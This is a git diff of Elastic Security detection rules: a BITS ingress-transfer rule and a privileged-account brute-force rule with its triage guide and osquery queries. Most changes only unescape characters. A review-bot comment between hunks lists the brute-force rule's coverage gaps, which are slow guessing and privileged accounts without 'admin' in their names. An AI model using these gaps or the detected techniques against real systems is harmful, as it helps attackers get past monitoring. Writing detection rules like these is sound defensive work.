diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_3.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_3.json index d84e4b021c3..fd8d1edd81b 100644 --- a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_3.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Ingress Transfer via Windows BITS", - "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) \u003e 30\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30\n", "references": [ "https://attack.mitre.org/techniques/T1197/" ], @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_4.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_4.json index 0b9a799d54d..f6162443e12 100644 --- a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_4.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Ingress Transfer via Windows BITS", - "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) \u003e 30\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n\nprocess.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension :(\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30\n", "references": [ "https://attack.mitre.org/techniques/T1197/" ], @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_5.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_5.json index 58c4538561c..e9af9978a38 100644 --- a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_5.json +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_5.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Ingress Transfer via Windows BITS", - "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n process.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension : (\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or\n file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) \u003e 30 and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp*\\\\wct*.tmp\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\RdrServicesUpdater*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Docker Desktop Installer\\\\update-*.exe\"\n )\n", + "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n process.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension : (\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"wsh\", \"js\", \"vbe\", \"pif\", \"scr\", \"cmd\", \"cpl\") or\n file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30 and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp*\\\\wct*.tmp\",\n 
\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\RdrServicesUpdater*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Docker Desktop Installer\\\\update-*.exe\"\n )\n", "references": [ "https://attack.mitre.org/techniques/T1197/" ], @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_1.json b/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_1.json index b3531efc5e7..b00e841da55 100644 --- a/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_4.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_4.json index e1de7a5a759..f523f3c26ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_4.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source 
host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. 
If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" 
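Review bot: The investigation guide on the new note line never states the two heuristics that bound this rule's coverage, both visible in the query: only accounts whose `user.name` contains `admin` are watched, and an alert needs five failures within `maxspan=10s` from a single `source.ip`. A spray throttled to one guess every few seconds, or a privileged account whose name lacks `admin` (break-glass or service accounts holding domain-admin rights), will not fire this rule, and an analyst reading the note as "privileged brute force is covered" would be misled. I would add one sentence after the rule summary in the note, e.g. `Note that only accounts whose name contains admin are covered, and only bursts of at least five failures within ten seconds; slower guessing or differently named privileged accounts need separate coverage.` Since the note is a single JSON string, the change is to the value on the `+` line.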
@@ -67,7 +67,7 @@ ], "risk_score": 47, "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_5.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_5.json index 944018e3cc5..a3513819ca2 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_5.json +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_5.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source 
host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. 
If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -67,7 +67,7 @@ ], "risk_score": 47, "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_6.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_6.json index e36f773579a..dc012457d78 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_6.json +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_6.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source 
host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. 
If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 